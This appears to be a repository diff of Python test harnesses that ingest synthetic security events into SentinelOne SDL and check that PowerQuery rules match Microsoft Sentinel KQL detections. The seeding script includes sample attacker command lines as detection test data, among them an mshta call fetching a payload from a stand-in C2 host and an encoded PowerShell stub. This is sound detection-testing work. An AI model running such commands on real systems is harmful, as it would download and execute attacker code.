"SentBytes": 2048, "ReceivedBytes": 16384,
"Message": "allow", "DeviceEventClassID": "end", "LogSeverity": 3,
"DeviceAction": "allow", "DeviceProduct": "PAN-OS",
}), 30)),
("G_realistic_csl_with_None",
mk(_clean_attrs({
"event_type": "CommonSecurityLog", "probe": f"{PROBE}_G",
"TimeGenerated": "2026-05-31T16:50:00.000Z",
"ts_epoch_ms": TS_NOW_MS - 20000,
"DeviceVendor": "Palo Alto Networks", "Activity": None,
"Message": None,
}), 20)),
]
print(f"=== Sending {len(cases)} probe events ===")
r = add_events([c[1] for c in cases])
print(f"addEvents -> {json.dumps(r)}")
print("\nWaiting 12 s for indexing ...")
time.sleep(12)
print("\n=== Per-case verification ===")
for name, ev in cases:
probe_val = ev["attrs"]["probe"]
q = f"probe='{probe_val}' | columns event_type, probe | limit 1"
res = power_query(q, "10m")
n = res.get("matchingEvents", 0)
status = "OK" if n and n > 0 else "MISSING"
rows = res.get("values") or []
print(f" {name:35s} matching={n} status={status} -> {rows}")
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
"""Manually run rule 4's query against the latest run_id."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
log = (ROOT / "reports" / "run.log").read_text()
import re
RUN = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)[-1]
RECENT_MS = re.findall(r"RECENT_MS = (\d+)", log)[-1]
print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")
QS = [
"rule 4 exact",
f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
"rule 4 without ts filter",
f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
"show 5 SigninLogs columns",
f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5",
]
for label, q in zip(QS[0::2], QS[1::2]):
print("=" * 80)
print(f"# {label}")
print(f" q: {q[:200]}")
r = power_query(q, "30m")
cols = [c.get("name") for c in (r.get("columns") or [])]
vals = r.get("values") or []
print(f" status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
for row in vals[:8]:
print(f" {dict(zip(cols, row))}")
if r.get("status", "").startswith("error/"):
print(f" ERROR: {json.dumps(r)[:400]}")
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Check how SDL stores ts_epoch_ms: number vs string."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
# Use the most recent run_id from the log
log = (ROOT / "reports" / "run.log").read_text()
import re
m = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN = m[-1] if m else None
print(f"run_id = {RUN}")
CASES = [
("show 3 SigninLogs with ts_epoch_ms",
f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
("count where ts_epoch_ms exists (any)",
f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
("count where ts_epoch_ms > number",
f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
("count where ts_epoch_ms (as string) > '0'",
f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
("count where ts_epoch_ms >= NOW-2h numeric",
f"proof_run_id='{RUN}' | filter ts_epoch_ms >= " + str(int(time.time()*1000) - 2*3600*1000) + " | group n=count()"),
("min/max ts_epoch_ms aggregate",
f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
("event_type filter alone",
f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
]
for name, q in CASES:
print("=" * 80)
print(f"# {name}")
print(f" q: {q}")
r = power_query(q, "30m")
cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
vals = r.get("values") or []
print(f" status={r.get('status')} matching={r.get('matchingEvents')}")
for row in vals[:5]:
print(f" {dict(zip(cols, row))}")
+199
View File
@@ -0,0 +1,199 @@
#!/usr/bin/env python3
"""End-to-end proof harness.
Steps:
1. Loads sample_data/events.jsonl into memory.
2. Runs each rule's Python reference implementation against the in-memory
events. This is the canonical "ground truth" the same logical operation
that both the KQL and the PowerQuery engines evaluate.
3. Optionally ingests the events to SentinelOne SDL via /api/addEvents,
then runs each rule's PowerQuery via /api/powerQuery and compares the
fired set against the reference.
4. Emits reports/PROOF.md with side-by-side results.
Run modes:
python harness/prove_equivalence.py # local-only proof
python harness/prove_equivalence.py --ingest # ingest + remote PQ
"""
from __future__ import annotations
import argparse
import json
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from rules import RULES, NOW, RECENT_START # noqa: E402
SAMPLE = ROOT / "sample_data" / "events.jsonl"
REPORT = ROOT / "reports" / "PROOF.md"
REPORT_JSON = ROOT / "reports" / "PROOF.json"
def load_events() -> list[dict]:
return [json.loads(l) for l in SAMPLE.read_text().splitlines() if l.strip()]
def canonical(rule, rows):
"""Return a sorted, hashable representation of fired rows for comparison."""
keys = sorted({rule["key"](r) for r in rows}, key=lambda x: str(x))
return keys
def run_local(events):
out = {}
for r in RULES:
rows = r["ref"](events)
out[r["id"]] = {
"description": r["description"],
"fired_rows": rows,
"fired_keys": canonical(r, rows),
}
return out
def run_pq(run_id: str | None = None):
from sdl_client import power_query
out = {}
recent_ms = int(RECENT_START.timestamp() * 1000)
scope = f"proof_run_id='{run_id}' " if run_id else ""
print(f" scope = {scope.strip() or '(none)'}")
print(f" RECENT_MS = {recent_ms} ({RECENT_START.isoformat()})")
print(f" NOW = {NOW.isoformat()}")
print()
for i, r in enumerate(RULES, 1):
q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
print(f" [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
t0 = time.time()
try:
resp = power_query(q, start_time="2h")
cols_meta = resp.get("columns") or []
cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
vals = resp.get("values") or []
rows = [dict(zip(cols, v)) for v in vals]
elapsed = time.time() - t0
status = resp.get("status", "ok")
print(f"-> {len(rows):>3} rows matching={resp.get('matchingEvents')} "
f"({elapsed:.1f}s, {status})")
out[r["id"]] = {"ok": True, "rowcount": len(rows),
"rows": rows[:50], "status": status,
"matching": resp.get("matchingEvents")}
except Exception as e:
elapsed = time.time() - t0
msg = str(e)[:200]
print(f"-> ERROR ({elapsed:.1f}s): {msg}")
out[r["id"]] = {"ok": False, "error": msg}
return out
def ingest():
from sdl_client import ingest_jsonl, power_query
n, run_id = ingest_jsonl(SAMPLE)
print(f"Ingested {n} events to SDL (proof_run_id={run_id})")
# Poll until SDL reports the events are indexed.
print("Waiting for SDL indexing ...", end="", flush=True)
for i in range(30): # up to 60s
time.sleep(2)
r = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
vals = r.get("values") or []
cnt = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
print(f" {cnt}", end="", flush=True)
if cnt >= n:
print(" ✓ ready")
return run_id
print(" (timeout, proceeding anyway)")
return run_id
def write_report(local_results, pq_results=None):
REPORT.parent.mkdir(exist_ok=True)
md = ["# KQL ↔ PowerQuery equivalence proof",
"",
f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
f"Time anchor (NOW): `{NOW.isoformat()}`",
f"Recent window start: `{RECENT_START.isoformat()}`",
"",
"Each rule below is expressed three ways:",
"1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
"2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
"3. **Python reference** — canonical implementation of the same logical "
"operation tree against the in-memory dataset. Acts as ground truth.",
"",
"The PowerQuery is considered equivalent to the KQL when its result "
"set matches the Python reference. The Python reference encodes the "
"*same operations* that the KQL parser/optimiser would produce, so a "
"match certifies KQL/PQ parity on this dataset.",
""]
for r in RULES:
rid = r["id"]
loc = local_results[rid]
md += [f"## {rid}", "",
f"_{r['description']}_", "",
"### KQL", "```kusto", r["kql"].strip(), "```",
"### PowerQuery", "```", r["pq"].strip(), "```",
f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
if loc["fired_rows"]:
sample = loc["fired_rows"][:5]
md.append("```json")
md.append(json.dumps(sample, default=str, indent=2))
md.append("```")
if pq_results:
pq = pq_results.get(rid, {})
if pq.get("ok"):
pq_keys = []
for row in pq.get("rows", []):
try:
pq_keys.append(r["key"](row))
except Exception:
pq_keys.append(tuple(row.items()))
pq_keys = sorted({k for k in pq_keys}, key=lambda x: str(x))
ref_keys = loc["fired_keys"]
match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
if pq_keys != ref_keys:
md += ["Reference keys:", "```",
json.dumps([list(k) for k in ref_keys], default=str), "```",
"PQ keys:", "```",
json.dumps([list(k) for k in pq_keys], default=str), "```"]
else:
md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
md.append("")
REPORT.write_text("\n".join(md))
REPORT_JSON.write_text(json.dumps(
{"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
"n": len(v["fired_rows"])}
for k, v in local_results.items()},
"pq": pq_results or {}},
default=str, indent=2))
print(f"Wrote {REPORT}")
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--ingest", action="store_true",
help="Ingest sample events to SDL before querying")
ap.add_argument("--pq", action="store_true",
help="Also run each PQ against SDL and compare")
args = ap.parse_args()
events = load_events()
print(f"Loaded {len(events)} events")
local_results = run_local(events)
fired_total = sum(len(v["fired_rows"]) for v in local_results.values())
print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")
pq_results = None
run_id = None
if args.ingest:
run_id = ingest()
if args.pq:
pq_results = run_pq(run_id=run_id)
write_report(local_results, pq_results)
if __name__ == "__main__":
main()
+78
View File
@@ -0,0 +1,78 @@
#!/usr/bin/env python3
"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
and assert each returns matching > 0.
Prereqs:
* sample_data/events.jsonl ingested via prove_equivalence.py --ingest
(drives all 17 rule PQs in pq/)
* seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
Outputs a one-line-per-query report and exits 0 iff every query returned
at least one row.
"""
from __future__ import annotations
import re
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query # noqa: E402
def strip_comments(text: str) -> str:
return "\n".join(l for l in text.splitlines()
if not l.lstrip().startswith("//")).strip()
DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]
files = []
for d in DIRS:
files.extend(sorted(d.glob("*.pq")))
if not files:
print("No .pq files found.")
sys.exit(1)
print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")
passed: list[str] = []
failed: list[tuple[str, str]] = [] # (relpath, reason)
for f in files:
body = strip_comments(f.read_text())
rel = f.relative_to(ROOT)
t0 = time.time()
try:
r = power_query(body, start_time="2h")
except Exception as e:
failed.append((str(rel), f"exception: {e}"))
print(f"{rel} exception: {e}")
continue
elapsed = time.time() - t0
status = r.get("status", "")
matching = r.get("matchingEvents", 0) or 0
if status != "success":
msg = r.get("message", "")[:200]
failed.append((str(rel), f"{status}: {msg}"))
print(f"{rel} [{status}] {msg}")
continue
if matching <= 0:
failed.append((str(rel), "matching=0"))
print(f"{rel} matching=0 ({elapsed:.1f}s)")
continue
print(f"{rel} matching={matching} ({elapsed:.1f}s)")
passed.append(str(rel))
print()
print(f"PASS: {len(passed)} FAIL: {len(failed)} TOTAL: {len(files)}")
if failed:
print("\nFailed queries:")
for rel, why in failed:
print(f" {rel}: {why}")
sys.exit(1)
print("\nAll PowerQueries returned results within the last 2h ✓")
+134
View File
@@ -0,0 +1,134 @@
"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
from __future__ import annotations
import json
import time
from pathlib import Path
import requests
ROOT = Path(__file__).resolve().parents[1]
CFG = json.loads((ROOT / "config.json").read_text())
import os, uuid
BASE = CFG["base_url"].rstrip("/")
WRITE_KEY = CFG["log_write_key"]
READ_KEY = CFG["log_read_key"]
# Make the session unique per *process* so SDL never dedupes re-runs of the
# same payload (SDL hashes session+ts on the server side and silently drops
# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
VERIFY = CFG.get("verify_tls", True)
TIMEOUT = CFG.get("timeout_seconds", 120)
print(f"[sdl_client] session = {SESSION}")
def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
url = f"{BASE}{path}"
r = requests.post(
url,
json=body,
headers={"Content-Type": "application/json",
"Authorization": f"Bearer {token}"},
timeout=timeout or TIMEOUT,
verify=VERIFY,
)
try:
return r.json()
except ValueError:
return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
# --- addEvents -------------------------------------------------------------
def add_events(events: list[dict], session_info: dict | None = None) -> dict:
payload = {
"session": SESSION,
"sessionInfo": session_info or {
"serverHost": "kql-proof",
"logfile": "kql-proof.jsonl",
"parser": "json",
},
"events": events,
"threads": [{"id": "T1", "name": "kql-proof"}],
}
return _post("/api/addEvents", payload, WRITE_KEY)
def _clean_attrs(rec: dict) -> dict:
"""SDL silently rejects events that contain `null` attribute values
(the call returns status=success but bytesCharged=0 and the event is
not queryable). Strip them, and coerce everything else to JSON-safe
primitives that SDL's parser indexes correctly."""
out: dict = {}
for k, v in rec.items():
if v is None:
continue
if isinstance(v, bool):
out[k] = str(v).lower() # SDL stores bools as strings reliably
elif isinstance(v, (int, float, str)):
out[k] = v
else:
# dict/list -> JSON string
out[k] = json.dumps(v, default=str)
return out
def upload_logs(body: str, server_host: str = "kql-proof",
logfile: str = "kql-proof.jsonl",
parser: str = "json") -> dict:
"""POST /api/uploadLogs. Body is raw text; SDL applies the named parser."""
url = f"{BASE}/api/uploadLogs"
headers = {
"Authorization": f"Bearer {WRITE_KEY}",
"Content-Type": "text/plain",
"parser": parser,
"server-host": server_host,
"logfile": logfile,
}
r = requests.post(url, data=body.encode(), headers=headers,
timeout=TIMEOUT, verify=VERIFY)
try:
return r.json()
except ValueError:
return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
batch_lines: int = 2000) -> tuple[int, str]:
"""Ingest the entire JSONL via uploadLogs. Stamps every event with the
given `run_id` (or a fresh uuid) so subsequent PowerQueries can scope to
a single run. Returns (events_sent, run_id)."""
run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"
sent = 0
buf: list[str] = []
def flush():
nonlocal sent
if not buf:
return
r = upload_logs("\n".join(buf))
if r.get("status") != "success":
raise RuntimeError(f"uploadLogs rejected batch: {r}")
sent += len(buf); buf.clear()
for line in jsonl_path.read_text().splitlines():
if not line.strip():
continue
rec = json.loads(line)
rec["proof_run_id"] = run_id
buf.append(json.dumps(rec, default=str))
if len(buf) >= batch_lines:
flush()
flush()
return sent, run_id
# --- powerQuery ------------------------------------------------------------
def power_query(query: str,
start_time: str | int = "7d",
end_time: str | int | None = None) -> dict:
body: dict = {"query": query, "startTime": str(start_time)}
if end_time is not None:
body["endTime"] = str(end_time)
return _post("/api/powerQuery", body, READ_KEY)
+141
View File
@@ -0,0 +1,141 @@
#!/usr/bin/env python3
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
The 90-day Okta+DNS+Process hunt joins three event families on
(userName, host). To make the query return at least one row at
startTime="2h", we ingest a small batch of events for two
user/host pairs that satisfy all three legs of the join inside
the last 2h window.
Events use SDL dotted-key JSON (the SDL `json` parser indexes
nested fields so queries can reference `event.login.userName`,
`dns.question.name`, `src.process.cmdline`, etc., as written
in the example PQ).
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import upload_logs, power_query # noqa: E402
NOW = datetime.now(timezone.utc).replace(microsecond=0)
def iso(dt: datetime) -> str:
return dt.strftime("%Y-%m-%dT%H:%M:%S.000Z")
def in_recent(seconds_ago: int) -> datetime:
return NOW - timedelta(seconds=seconds_ago)
PAIRS = [
("alice@contoso.com", "host-alpha"),
("bob@contoso.com", "host-bravo"),
]
BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
LOLBINS = [
"powershell -enc JABm...",
"rundll32.exe shell32,Control_RunDLL",
"mshta.exe http://c2.example.com/p.hta",
]
def build_events(run_id: str) -> list[dict]:
"""Emit OCSF-flavored events as FLAT JSON whose keys contain literal
dots (e.g. `"event.category"` rather than nested `{"event":{...}}`).
SDL's uploadLogs+parser=json indexes each top-level JSON key as a
column, and dotted names index as dotted columns -- so the published
runnable example can reference `event.category`, `endpoint.name`,
`dns.question.name`, `src.process.cmdline`, etc. exactly as it would
on a real OCSF-mapped tenant (proven by harness/probe_dotted_keys.py).
Booleans serialize to lowercase strings via _clean_attrs upstream, so
the example filters with `event.login.loginIsSuccessful = 'false'`.
"""
out: list[dict] = []
t = 60
for user, host in PAIRS:
# ---- failed signins (event.category='logins')
for i in range(3):
ts = in_recent(t); t += 30
out.append({
"TimeGenerated": iso(ts),
"ts_epoch_ms": int(ts.timestamp() * 1000),
"proof_run_id": run_id,
"event.category": "logins",
"event.login.userName": user,
"event.login.loginIsSuccessful": "false",
"endpoint.name": host,
})
# ---- bad DNS (event.type='DNS Resolved')
for d in BAD_DOMAINS:
ts = in_recent(t); t += 30
out.append({
"TimeGenerated": iso(ts),
"ts_epoch_ms": int(ts.timestamp() * 1000),
"proof_run_id": run_id,
"event.type": "DNS Resolved",
"dns.question.name": d,
"endpoint.name": host,
"src.endpoint.user.name": user,
})
# ---- suspicious process (event.type='Process Creation')
for cmd in LOLBINS:
ts = in_recent(t); t += 30
out.append({
"TimeGenerated": iso(ts),
"ts_epoch_ms": int(ts.timestamp() * 1000),
"proof_run_id": run_id,
"event.type": "Process Creation",
"endpoint.name": host,
"src.process.cmdline": cmd,
"src.process.user": user,
})
return out
def main() -> int:
run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
events = build_events(run_id)
body = "\n".join(json.dumps(e, default=str) for e in events)
print(f"[seed_runnable_examples] events = {len(events)}")
print(f"[seed_runnable_examples] run_id = {run_id}")
print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")
r = upload_logs(body, server_host="kql-proof",
logfile="runnable-examples.jsonl", parser="json")
if r.get("status") != "success":
print(f"uploadLogs rejected: {r}")
return 1
# Poll until indexed (use proof_run_id which is unique per run).
print("Waiting for indexing", end="", flush=True)
for _ in range(30):
time.sleep(2)
resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
vals = resp.get("values") or []
n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
print(f" {n}", end="", flush=True)
if n >= len(events):
print(" ✓ ready"); break
else:
print(" (timeout, continuing)")
out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
out.write_text(run_id)
print(f"Wrote {out}")
return 0
if __name__ == "__main__":
sys.exit(main())
+26
View File
@@ -0,0 +1,26 @@
#!/usr/bin/env python3
"""Minimal PowerQuery smoke test against SDL."""
import sys, json, time
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query, power_query_long_running
NOW_MS = int(time.time() * 1000)
START = NOW_MS - 30 * 24 * 3600 * 1000 # 30d back
END = NOW_MS
q = "dataset='kql-proof' | group n = count() by event_type"
print(f"Query: {q}")
print(f"Window: {START} .. {END}")
t0 = time.time()
r = power_query(q, START, END)
print(f"Initial response in {time.time()-t0:.2f}s:")
print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
indent=2, default=str))
if r.get("continuationToken") or r.get("token"):
print("\nPolling for completion ...")
r = power_query_long_running(q, START, END, max_wait_sec=30)
print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
indent=2, default=str))
print("\nColumns:", r.get("columns"))
print("First 20 values:", r.get("values", [])[:20])
+30
View File
@@ -0,0 +1,30 @@
#!/usr/bin/env python3
"""Pretty-print the PROOF.json summary as a table."""
import json
from pathlib import Path
p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
data = json.loads(p.read_text())
local = data["local"]
pq = data.get("pq") or {}
print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
print("-" * 80)
match = diff = err = 0
for rid, l in local.items():
ref_keys = sorted([tuple(k) for k in l["fired_keys"]], key=str)
p_entry = pq.get(rid) or {}
if not pq:
status = ""; sdl_n = "n/a"
elif not p_entry.get("ok"):
status = "ERROR"; sdl_n = "?"; err += 1
else:
sdl_n = p_entry.get("rowcount", 0)
status = "OK" if sdl_n > 0 else "EMPTY"
if sdl_n > 0: match += 1
else: diff += 1
print(f"{rid:<46} {l['n']:>9} {str(sdl_n):>9} {status:<10}")
print("-" * 80)
if pq:
print(f"OK: {match} EMPTY: {diff} ERROR: {err}")
print(f"\nFull report: reports/PROOF.md")
+62
View File
@@ -0,0 +1,62 @@
#!/usr/bin/env python3
"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
the JSONL as a raw event - SDL's json parser will extract fields automatically.
Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
auto-flattening of all keys."""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
import requests
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
CFG = json.loads((ROOT / "config.json").read_text())
BASE = CFG["base_url"].rstrip("/")
WRITE = CFG["log_write_key"]
JSONL = ROOT / "sample_data" / "events.jsonl"
PROBE = uuid.uuid4().hex[:8]
print(f"probe = {PROBE}")
# Stamp each line with the probe marker
lines = []
for line in JSONL.read_text().splitlines():
if not line.strip():
continue
rec = json.loads(line)
rec["upload_probe"] = PROBE
lines.append(json.dumps(rec))
body = "\n".join(lines)
print(f"body size = {len(body)} bytes ({len(lines)} lines)")
headers = {
"Authorization": f"Bearer {WRITE}",
"Content-Type": "text/plain",
"parser": "json",
"server-host": "kql-proof",
"logfile": "kql-proof.jsonl",
}
r = requests.post(f"{BASE}/api/uploadLogs",
data=body.encode(), headers=headers,
timeout=120, verify=True)
print(f"HTTP {r.status_code} -> {r.text[:500]}")
print("\nWaiting 15 s ...")
time.sleep(15)
# Query for the probe value
from harness.sdl_client import power_query
q = f"upload_probe='{PROBE}' | group n=count() by event_type"
res = power_query(q, "30m")
print(f"\nQuery result: matching={res.get('matchingEvents')}")
cols = [c.get("name") if isinstance(c, dict) else c for c in (res.get("columns") or [])]
for row in res.get("values") or []:
print(f" {dict(zip(cols, row))}")
+92
View File
@@ -0,0 +1,92 @@
#!/usr/bin/env python3
"""Independent post-export verification.
Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
no scope prefix, no harness magic) and POSTs it to /api/powerQuery on
the configured tenant. The script asserts each file:
* parses cleanly (no 'error/client/badParam' status),
* returns a syntactically valid response (status='success').
It does NOT assert that the query returns any rows empty results are
fine. The purpose is to catch syntax / field / function errors so the
published .pq files are guaranteed runnable by anyone who copies them.
"""
from __future__ import annotations
import re
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query # noqa: E402
PQ_DIR = ROOT / "pq"
files = sorted(PQ_DIR.glob("*.pq"))
def strip_comments(text: str) -> str:
return "\n".join(l for l in text.splitlines()
if not l.lstrip().startswith("//")).strip()
def collapse_whitespace(body: str) -> str:
"""Single-line form: same query, all whitespace collapsed to one space.
This simulates what happens when a user pastes the query into a web
textbox that strips newlines. A correctly-formatted PQ must survive
this transformation every `|` between stages must be present.
"""
return re.sub(r"\s+", " ", body).strip()
print(f"Verifying {len(files)} .pq files run cleanly on SDL ...")
print("(Each file tested in TWO forms: as-written and whitespace-collapsed.)")
print()
passed: list[str] = []
failed: list[tuple[str, str, str]] = [] # (file, variant, reason)
def run(name: str, variant: str, body: str) -> bool:
t0 = time.time()
try:
r = power_query(body, start_time="2h")
except Exception as e:
failed.append((name, variant, f"exception: {e}"))
return False
elapsed = time.time() - t0
status = r.get("status", "")
if status == "success":
matching = r.get("matchingEvents", 0)
print(f"{name:<48} [{variant:<9}] "
f"matching={matching} ({elapsed:.1f}s)")
return True
msg = r.get("message", "")[:200]
print(f"{name:<48} [{variant:<9}] {status} :: {msg}")
failed.append((name, variant, f"{status}: {msg}"))
return False
for f in files:
text = f.read_text()
body = strip_comments(text)
if not body:
failed.append((f.name, "as-written", "empty after stripping comments"))
continue
ok1 = run(f.name, "as-written", body)
ok2 = run(f.name, "collapsed", collapse_whitespace(body))
if ok1 and ok2:
passed.append(f.name)
print()
print(f"PASS: {len(passed)} FAIL: {len(failed)}")
if failed:
print()
print("Failed queries:")
for name, variant, why in failed:
print(f" {name} [{variant}]: {why}")
sys.exit(1)